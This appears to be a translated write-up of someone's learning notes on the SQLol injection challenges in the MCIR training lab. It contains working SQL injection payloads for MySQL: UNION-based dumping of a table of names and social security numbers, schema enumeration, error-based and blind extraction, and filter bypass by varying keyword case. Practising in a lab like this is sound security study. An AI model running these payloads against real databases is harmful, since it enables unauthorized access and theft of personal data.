Injection learning records in MCIR

Source: Internet
Author: User


Environment: xampp-win32-5.6.3-0-VC11 mcir

Preface

MCIR is also one of the top ten, yet it seems nobody has written any material about it. That makes it really hard for a newbie to learn this system. I planned to study it and sort out my notes in two days, but one day has already passed and I am still scratching my head. Comparing the time I spent with what I actually got done makes me feel terrible. Ah, the pressure is so big!!!

Finally I found a video on YouTube and watched a bit of it. The video is Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley.

Back to the point.

Preparation

First, change the database connection password in the program (if the xampp integrated environment is used, set the password to empty):

D:\xampp\htdocs\mcir\sqlol\includes\database.config.php

Start

On the homepage, select SQLol to go to the page.

The menu shows: INSERT | UPDATE | DELETE | SELECT | Custom | Challenges

Select Challenges. The following figure is displayed:

We work through the challenges one at a time, in order of their level.

Challenge 0

This one is simple: it asks for all user names.

Your objective is to get the query to return all usernames instead of just one.

If the prompt is 'struct', use the following statement to obtain the result:

Of course, besides ' or '1'='1, we can also use the '=' injection method shown in the official video.

Challenge 1

In challenge 1, the requirements are as follows:

Your objective is to find the table of social security numbers present in the database and extract its information.

You need to find the table. My approach is as follows:

First guess the number of columns in the result set with ORDER BY: it is 1. Then get the connecting user, the database name and the version. The statement is as follows:

' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) # 

Result: root @ localhost: sqlol: 5.6.21

Then we guess the table in sqlol:

' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C # 

Get two tables: ssn and users.


We need the social security numbers, so looking at the two tables, the ssn table is clearly the one we want. Next, list all the fields of the ssn table.

' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E # 

Two fields are obtained: name and ssn.

Then the field value is displayed.

' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn # 

The obtained information is as follows:

Challenge 2-The Failure of Quote Filters

In Challenge 2 the requirements are exactly the same. Copying the last statement above directly gives an error, so read the challenge description carefully:

Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.

Honestly, once I looked at it, it was clear that the web application filters out single quotes. So we try the same statement without the leading quote:

and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn # 

The result is as follows:

Challenge 3-Death Row

The challenges are described as follows:

You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query. 

This means the goal is the same as challenge 1, but the result no longer shows all rows; only one row is returned at a time.

For this type, we construct the statements as follows, stepping through the rows one by one:

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 # 
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 # 
... 

Challenge 4-War on Error

See the description:

In this challenge, no output from the query is shown, but verbose errors are shown.Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.

This means the query result is not displayed, so you need to construct a statement that puts the data into an error message (error messages are displayed here).

The constructed statements are as follows, again one row at a time:

' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a' 
AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a... 

Challenge 5-Blind Luck

See the description:

You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.

This means error messages are disabled and the injection has to be done blind.

For this type of injection the page only reveals a boolean, so we need to construct comparison statements??? And must we use or??? For example, narrowing down the first character of the first table name:

' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 # 
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 # 
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 # 

Challenge 6-Stack the Deck

In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario. Your objective is to create a new table called "ipwntyourdb" using stacked queries.

Challenge 6 requires stacked queries, but PHP's MySQL extension does not support them. See the discussion here: SQL: Does php + mysql support stacked queries?

So this challenge does not seem achievable ----

Challenge 7-Walking on Thin Ice

In this challenge, no output from the query is shown, but verbose errors are shown. Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database. (If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

... It is unclear how the delete injection vulnerability works here.

Challenge 8-Black Comedy

You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place. Your objective is to find the table of social security numbers present in the database and extract its information.

The default blacklist filter can be bypassed. The injection statement is as follows:

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username=' 

Challenge 9-Administrative Tasks

In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user. Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3.

Not implemented -----
